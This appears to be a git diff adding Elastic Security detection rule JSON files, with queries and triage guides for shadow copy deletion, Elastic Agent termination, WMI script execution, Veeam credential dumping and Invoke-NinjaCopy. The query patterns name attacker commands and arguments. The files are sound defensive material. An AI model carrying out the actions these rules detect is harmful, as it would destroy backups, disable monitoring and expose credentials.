VssAdmin\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes that can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow Copies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow copies worth monitoring.\n\nThis rule monitors the execution of Vssadmin.exe to either delete or resize shadow copies.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule may produce benign true positives (B-TPs). If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\"\n and (process.name : \"vssadmin.exe\" or ?process.pe.original_file_name == \"VSSADMIN.EXE\") and\n process.args in (\"delete\", \"resize\") and process.args : \"shadows*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_111.json b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_111.json new file mode 100644 index 00000000000..255240236fc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_111.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of vssadmin.exe for shadow copy deletion or resizing on endpoints. This commonly occurs in tandem with ransomware or other destructive attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Volume Shadow Copy Deleted or Resized via VssAdmin", + "note": "## Triage and analysis\n\n### Investigating Volume Shadow Copy Deleted or Resized via VssAdmin\n\nThe Volume Shadow Copy Service (VSS) is a Windows feature that enables system administrators to take snapshots of volumes that can later be restored or mounted to recover specific files or folders.\n\nA typical step in the playbook of an attacker attempting to deploy ransomware is to delete Volume Shadow Copies to ensure that victims have no alternative to paying the ransom, making any action that deletes shadow copies worth monitoring.\n\nThis rule monitors the execution of Vssadmin.exe to either delete or resize shadow copies.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- In the case of a resize operation, check if the resize value is equal to suspicious values, like 401MB.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If unsigned files are found on the process tree, retrieve them and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences in other hosts.\n- Check if any files on the host machine have been encrypted.\n\n\n### False positive analysis\n\n- This rule may produce benign true positives (B-TPs). If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Related rules\n\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Priority should be given due to the advanced stage of this activity on the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- If data was encrypted, deleted, or modified, activate your data recovery plan.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\"\n and (process.name : \"vssadmin.exe\" or ?process.pe.original_file_name == \"VSSADMIN.EXE\") and\n process.args in (\"delete\", \"resize\") and process.args : \"shadows*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Impact", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1490", + "name": "Inhibit System Recovery", + "reference": "https://attack.mitre.org/techniques/T1490/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "b5ea4bfe-a1b2-421f-9d47-22a75a6f2921_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_106.json b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_106.json new file mode 100644 index 00000000000..60b365a20b4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b627cd12-dac4-11ec-9582-f661ea17fbcd_106.json @@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the Elastic endpoint agent has stopped and is no longer running on the host. Adversaries may attempt to disable security monitoring tools in an attempt to evade detection or prevention capabilities during an intrusion. This may also indicate an issue with the agent itself and should be addressed to ensure defensive measures are back in a stable state.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Elastic Agent Service Terminated", + "query": "process where\n/* net, sc or wmic stopping or deleting Elastic Agent on Windows */\n(event.type == \"start\" and\n process.name : (\"net.exe\", \"sc.exe\", \"wmic.exe\",\"powershell.exe\",\"taskkill.exe\",\"PsKill.exe\",\"ProcessHacker.exe\") and\n process.args : (\"stopservice\",\"uninstall\", \"stop\", \"disabled\",\"Stop-Process\",\"terminate\",\"suspend\") and\n process.args : (\"elasticendpoint\", \"Elastic Agent\",\"elastic-agent\",\"elastic-endpoint\"))\nor\n/* service or systemctl used to stop Elastic Agent on Linux */\n(event.type == \"end\" and\n (process.name : (\"systemctl\", \"service\") and\n process.args : \"elastic-agent\" and\n process.args : \"stop\")\n or\n /* pkill , killall used to stop Elastic Agent on Linux */\n ( event.type == \"end\" and process.name : (\"pkill\", \"killall\") and process.args: \"elastic-agent\")\n or\n /* Unload Elastic Agent extension on MacOS */\n (process.name : \"kextunload\" and\n process.args : \"com.apple.iokit.EndpointSecurity\" and\n event.action : \"end\"))\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b627cd12-dac4-11ec-9582-f661ea17fbcd", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "b627cd12-dac4-11ec-9582-f661ea17fbcd_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_108.json b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_108.json new file mode 100644 index 00000000000..de88753c3fd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b64b183e-1a76-422d-9179-7b389513e74d_108.json @@ -0,0 +1,159 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the built-in Windows script interpreters (cscript.exe or wscript.exe) being used to execute a process via Windows Management Instrumentation (WMI). This may be indicative of malicious activity.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Script Interpreter Executing Process via WMI", + "query": "sequence by host.id with maxspan = 5s\n [any where host.os.type == \"windows\" and \n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (?dll.name : \"wmiutils.dll\" or file.name : \"wmiutils.dll\") and process.name : (\"wscript.exe\", \"cscript.exe\")]\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"wmiprvse.exe\" and\n user.domain != \"NT AUTHORITY\" and\n (process.pe.original_file_name :\n (\n \"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"Cmd.Exe\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\",\n \"RegAsm.exe\",\n \"RegSvcs.exe\",\n \"msxsl.exe\",\n \"CONTROL.EXE\",\n \"EXPLORER.EXE\",\n \"Microsoft.Workflow.Compiler.exe\",\n \"msiexec.exe\"\n ) or\n process.executable : (\"C:\\\\Users\\\\*.exe\", \"C:\\\\ProgramData\\\\*.exe\")\n )\n ]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b64b183e-1a76-422d-9179-7b389513e74d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + }, + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "b64b183e-1a76-422d-9179-7b389513e74d_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b661f86d-1c23-4ce7-a59e-2edbdba28247_1.json b/packages/security_detection_engine/kibana/security_rule/b661f86d-1c23-4ce7-a59e-2edbdba28247_1.json new file mode 100644 index 00000000000..3d69f9818c7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b661f86d-1c23-4ce7-a59e-2edbdba28247_1.json @@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies commands that can access and decrypt Veeam credentials stored in MSSQL databases. Attackers can use Veeam Credentials to target backups as part of destructive operations such as Ransomware attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Veeam Credential Access Command", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n (process.name : \"sqlcmd.exe\" or process.pe.original_file_name : \"sqlcmd.exe\") or\n process.args : (\"Invoke-Sqlcmd\", \"Invoke-SqlExecute\", \"Invoke-DbaQuery\", \"Invoke-SqlQuery\")\n ) and\n process.args : \"*[VeeamBackup].[dbo].[Credentials]*\"\n", + "references": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b661f86d-1c23-4ce7-a59e-2edbdba28247", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "b661f86d-1c23-4ce7-a59e-2edbdba28247_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b7c05aaf-78c2-4558-b069-87fa25973489_2.json b/packages/security_detection_engine/kibana/security_rule/b7c05aaf-78c2-4558-b069-87fa25973489_2.json new file mode 100644 index 00000000000..9220e6802f1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b7c05aaf-78c2-4558-b069-87fa25973489_2.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects potential buffer overflow attacks by querying the \"Segfault Detected\" pre-built rule signal index, through a threshold rule, with a minimum number of 100 segfault alerts in a short timespan. A large amount of segfaults in a short time interval could indicate application exploitation attempts.", + "from": "now-9m", + "index": [ + ".alerts-security.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Buffer Overflow Attack Detected", + "query": "kibana.alert.rule.rule_id:5c81fc9d-1eae-437f-ba07-268472967013 and event.kind:signal\n", + "required_fields": [ + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": false, + "name": "kibana.alert.rule.rule_id", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "b7c05aaf-78c2-4558-b069-87fa25973489", + "setup": "## Setup\n\n\nThis rule leverages alert data from other prebuilt detection rules to function correctly. \n\n### Dependent Elastic Detection Rule Enablement\nAs a higher-order rule (based on other detections), this rule also requires the following prerequisite Elastic detection rule to be installed and enabled:\n- Segfault Detected (5c81fc9d-1eae-437f-ba07-268472967013)\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Initial Access", + "Use Case: Vulnerability", + "Rule Type: Higher-Order Rule" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + } + ], + "threshold": { + "field": [ + "event.kind", + "host.id" + ], + "value": 100 + }, + "timestamp_override": "event.ingested", + "type": "threshold", + "version": 2 + }, + "id": "b7c05aaf-78c2-4558-b069-87fa25973489_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_3.json b/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_3.json new file mode 100644 index 00000000000..f6794a3d661 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b81bd314-db5b-4d97-82e8-88e3e5fc9de5_3.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Enrich process events with uname and other command lines that imply Linux system information discovery.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Linux System Information Discovery", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and (\n process.name: \"uname\" or (\n process.name: (\"cat\", \"more\", \"less\") and process.args: (\"*issue*\", \"*version*\", \"*profile*\", \"*services*\", \"*cpuinfo*\")\n )\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "b81bd314-db5b-4d97-82e8-88e3e5fc9de5", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "b81bd314-db5b-4d97-82e8-88e3e5fc9de5_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_5.json b/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_5.json new file mode 100644 index 00000000000..c5450492628 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b8386923-b02c-4b94-986a-d223d9b01f88_5.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that contain the default exported functions used on Invoke-NinjaCopy. Attackers can use Invoke-NinjaCopy to read SYSTEM files that are normally locked, such as the NTDS.dit file or registry hives.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Invoke-NinjaCopy script", + "note": "## Triage and analysis\n\n### Investigating PowerShell Invoke-NinjaCopy script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available for use in various environments, creating an attractive way for attackers to execute code.\n\nInvoke-NinjaCopy is a PowerShell script capable of reading SYSTEM files that were normally locked, such as `NTDS.dit` or sensitive registry locations. It does so by using the direct volume access technique, which enables attackers to bypass access control mechanisms and file system monitoring by reading the raw data directly from the disk and extracting the file by parsing the file system structures.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Determine whether the script stores the captured data locally.\n- Check if the imported function was executed and which file it targeted.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"StealthReadFile\" or\n \"StealthReadFileAddr\" or\n \"StealthCloseFileDelegate\" or\n \"StealthOpenFile\" or\n \"StealthCloseFile\" or\n \"StealthReadFile\" or\n \"Invoke-NinjaCopy\"\n )\n and not user.id : \"S-1-5-18\"\n and not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n )\n", + "references": [ + "https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/collection/Invoke-NinjaCopy.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b8386923-b02c-4b94-986a-d223d9b01f88", + "severity": "medium", + "tags": [ 